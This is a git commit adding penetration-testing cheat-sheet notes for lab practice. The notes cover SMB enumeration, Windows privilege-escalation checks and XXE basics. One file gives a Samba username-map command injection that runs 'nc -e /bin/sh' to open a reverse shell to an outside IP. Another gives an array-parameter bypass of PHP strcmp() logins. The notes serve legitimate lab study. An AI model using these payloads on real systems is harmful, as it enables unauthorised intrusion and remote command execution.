smb exploit

This commit is contained in:
Stefan Friese 2022-12-29 01:37:26 +01:00
parent a5b29def31
commit 24937f7d68
10 changed files with 1249 additions and 0 deletions

File diff suppressed because it is too large Load Diff

View File

@ -1,3 +1,16 @@
# SMB
## SMBClient
* Use `smbclient` to list the share
```sh
smbclient -L //$TARGET_IP/
```
* The protocol might be dated, try
```sh
smbclient -L //$TARGET_IP/ --option='client min protocol=NT1'
```
# smbmap
* [Repo](https://github.com/ShawnDEvans/smbmap.git)

View File

@ -70,3 +70,23 @@ wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows
powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"
```
### Scheduled Services
* Check which services are scheduled via
```sh
schtasks
```
* Powershell's equivalent to scheduled tasks therefore is
```sh
ps
```
## Files
### Group permissions
* Check modification permissions on files and if the current user is able to modify via
```sh
whoami /all
icacls <filename>
```

View File

@ -0,0 +1,11 @@
# SMB Exploits
## usermap_script.rb
There can be a need to do manual exploitation for `Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)` like the HTB box `Lame` shows.
Since the automated exploit does not work, log in anonymously without an account and do the following
```sh
smb: \> logon "./=`nohup nc -e /bin/sh 10.10.17.20 4444`"
```
A connection to the root shell is provided.

View File

@ -0,0 +1,20 @@
# PHP strcmp() bypass
Given a `strcmp()` of a variable and a POST parameter value that looks like this
```php
[...]
if (strcmp($username, $_POST['username']) == 0) {
if (strcmp($password, $_POST['password']) == 0) {
[...]
```
If `$username` and `$password` are an array, sending a POST value as an array too will evaluate both `strcmp()` to 0.
Using a Burpsuite Proxy, intercepting the HTTP request and changing the POST parameters from
```http
username=admin&password=admin
```
to
```http
username[]=admin&password[]=admin
```

View File

@ -8,6 +8,7 @@ There are two types of XXE attacks: in-band and out-of-band (OOB-XXE).
2. out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application and attacker has to reflect the output of their XXE payload to some other file or their own server.
## Document Type Definition (DTD)
A DTD defines the structure and the legal elements and attributes of an XML document.
* Example file content of `note.dtd`
@ -37,6 +38,7 @@ A DTD defines the structure and the legal elements and attributes of an XML docu
```
## Replacing XML content
* Name in the example
```xml
<!DOCTYPE replace [<!ENTITY name "feast"> ]>

View File

@ -1,3 +1,4 @@
# Miscellaneous References
## Static Binaries
[andrew-d's statically compiles binary compilation](https://github.com/andrew-d/static-binaries.git)

View File

@ -2,6 +2,7 @@
[pentestmonkey's PHP Reverse Shell](https://github.com/pentestmonkey/php-reverse-shell.git)
[ivak-sincek's php-reverse-shell](https://github.com/ivan-sincek/php-reverse-shell.git)
[Impacket psexec.py](https://github.com/fortra/impacket/blob/master/examples/psexec.py)
## Generators